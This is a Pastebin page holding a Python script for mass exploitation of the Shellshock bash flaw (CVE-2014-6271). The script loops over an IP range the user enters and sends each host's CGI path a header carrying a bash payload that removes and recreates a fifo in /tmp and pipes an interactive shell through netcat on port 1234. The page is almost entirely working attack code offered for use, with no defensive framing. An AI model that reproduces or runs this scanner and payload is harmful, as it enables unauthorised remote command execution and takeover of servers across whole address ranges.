Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #CVE-2014-6271 cgi-bin reverse shell
- # NOTE :- This Script is not Mine, Just modded it for better use. ~ Un_N0n - mirror via Cyberwarzone.com
- import httplib,urllib
- print '\tCVE-2014-6271 mass exploitation tool\n'
- print '\tReverse shell returned on port 1234 ;) *We Love Shells*\n'
- url = raw_input("Enter The First Three Octets To Scan [Example : xxx.xxx.xxx] : ")
- finput = input("Enter the Starting IP of Range to Scan : ")
- sinput = input("Enter the Ending IP of Range to Scan for : ")
- print
- path = raw_input("Enter Vuln CGI Path : ")
- for x in range(finput,sinput + 1):
- murl = url + "." + str(x)
- conn = httplib.HTTPConnection(murl)
- reverse_shell="() { ignored;};/bin/bash -c '/bin/rm -f /tmp/f; /usr/bin/mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc -l 127.0.0.1 1234 > /tmp/f'"
- headers = {"Content-type": "application/x-www-form-urlencoded",
- "test": reverse_shell}
- conn.request("GET",path,headers=headers)
- res = conn.getresponse()
- if str(res.status) == '200':
- print "[+] Website Present and Payload Successfully Sent To " + murl + path
- data = res.read()
- print data
- else:
- print "[!]" + murl + path + " Is Not Vulnerable."
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
